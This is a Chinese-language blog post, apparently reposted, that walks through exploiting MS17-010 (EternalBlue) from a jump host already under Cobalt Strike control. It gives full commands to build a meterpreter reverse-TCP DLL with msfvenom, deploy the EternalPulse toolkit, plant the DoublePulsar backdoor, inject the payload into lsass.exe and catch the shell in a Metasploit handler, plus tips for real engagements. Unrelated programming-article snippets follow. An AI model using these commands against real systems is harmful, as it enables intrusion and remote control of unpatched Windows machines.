MS17010原生打法

MS17010原生打法1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。项目地址:https://github.com/TolgaSEZER/EternalPulsemsfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.3.128LPORT=4443-fdll>x

大家好,又见面了,我是你们的朋友全栈君。

1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。

项目地址:https://github.com/TolgaSEZER/EternalPulse

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.128 LPORT=4443 -f dll > x64.dll

在这里插入图片描述
2、将dll文件拷贝到EternalPulse工具目录下打包成zip,上传到cobaltstrike已控机器中。
在这里插入图片描述
3、查看目标主机是否安装解压缩软件。
shell dir “C:\Program Files”
在这里插入图片描述
4、解压缩工具包。
shell “C:\Program Files\7-Zip\7z.exe” x EternalPulse.zip -oc:\EternalPulse
或WinRAR:
“C:\Program Files\WinRAR\rar.exe” x c:\test\EternalPulse.rar c:\test
在这里插入图片描述
在这里插入图片描述
如果没有解压缩工具,给主机上传单个的rar.exe或7z.exe也可。

5、进入到解压缩后的工具目录。
在这里插入图片描述6、种植后门。
Eternalblue-2.2.0.exe –InConfig Eternalblue-2.2.0.xml –TargetIp 存在17010漏洞的IP –TargetPort 445 –Target WIN72K8R2
(也可以不指定–Target)
在这里插入图片描述
7、msf开启监听。

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.3.128
set lport 4443
exploit -j

在这里插入图片描述
8、执行Doublepulsar-1.3.1.exe工具远程执行后门

Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp 存在17010漏洞的IP --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload x64.dll --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60

在这里插入图片描述
9、msf成功接收session。
在这里插入图片描述
Ps:实战中应x32.dll,x64.dll都生成一份。使用Doublepulsar.exe的时候要写清参数的位数。dll在其他目录,也应指定好目录,如果没有cd到攻击程序文件夹路径的话,不光exe程序要指定绝对路径,同文件夹下的两个.xml文件也应指定绝对路径。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/130353.html原文链接:https://javaforall.net

(0)
上一篇 2022年6月14日 下午2:00
下一篇 2022年6月14日 下午2:00


相关推荐

  • java如何访问private方法_java什么叫方法重写

    java如何访问private方法_java什么叫方法重写当Java的类有一个方法的访问修饰符是private,我们在写测试类时该怎样对它进行测试吗?道难是先将它的修饰符改成public,然后在做完测试之后再将其改回public,其实完全不用这样做,我们在编写测试类的时候只要将其私有方法抽出,让其可以访问,就可以按要求进行测试了.开始我们先写一个被测试类,如下:package com.srcopen.test;public class Exa

    2026年3月12日
    7
  • FPGA实现千兆以太网发送

    FPGA实现千兆以太网发送科研要求 使用手上的 DE2 115 开发板实现千兆以太网的数据发送千兆以太网使用的时钟频率为 125MHz 一般的 GMII 接口由于收发数据所使用的数据线为 8 根即一个时钟周期的上升沿可以发送 8bit 数据 而 DE2 115 开发板所使用的接口为 RGMII 收发数据所使用的数据线为 4 根 所以需要在一个时钟周期的上升沿和下降沿都进行数据的传输 如下图 TX DATA 和 RX DATA 接下来就是具体的 verilog 代码的编写了 在这里参考了黑金开发板百兆网口的代码 以太网一帧的数据并不只包括数据 还有以太网协议用来检验

    2026年3月16日
    2
  • wstring操作与普通段字符操作对照表[终于解决]

    字符分类:宽字符函数普通C函数描述iswalnum()isalnum()测试字符是否为数字或字母iswalpha()isalpha()测试字符是否是字母iswcntrl()iscnt

    2021年12月18日
    75
  • 基于协同过滤的电影推荐系统的设计与实现(协同过滤推荐算法伪代码)

    1Mahout介绍ApacheMahout是ApacheSoftwareFoundation(ASF)旗下的一个开源项目,提供一些可扩展的机器学习领域经典算法的实现,旨在帮助开发人员更加方便快捷地创建智能应用程序。经典算法包括聚类、分类、协同过滤、进化编程等等,并且,在Mahout中还加入了对ApacheHadoop的支持,使这些算法可以更高效的运行在云计算环境中。…

    2022年4月11日
    322
  • Google搜索引擎的使用技巧「建议收藏」

    Google搜索引擎的使用技巧「建议收藏」Google搜索引擎的使用技巧(大家共同学习)1.全文搜索由于google搜索引擎默认空格是加号的规则:例如:mysqlforeignkey能搜索到mysql或者mysqlforeign但不一定能搜索得到mysqlforeignkey,如果要能搜索到mysqlforeignkey就要这样子“mysqlforeignkey”2.模糊搜索例如

    2025年10月17日
    8
  • iOS Instruments工具使用

    iOS Instruments工具使用iOS 性能优化 Instruments 工具前言 即使再牛的程序员 写出再棒的代码依然存在很多可优化的地方 更别说我们普通程序员写出的普通的代码 例如笔者 更是有很多的优化以及 bug 需要我们去调试 所以代码优化是我们必须掌握的技能 今天笔者给大家介绍一款代码分析优化工具 Xcode 自带的检测调试工具 Instruments Instruments 提供了很多功能 我会重点介绍一下我最常用的几

    2026年3月17日
    2

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号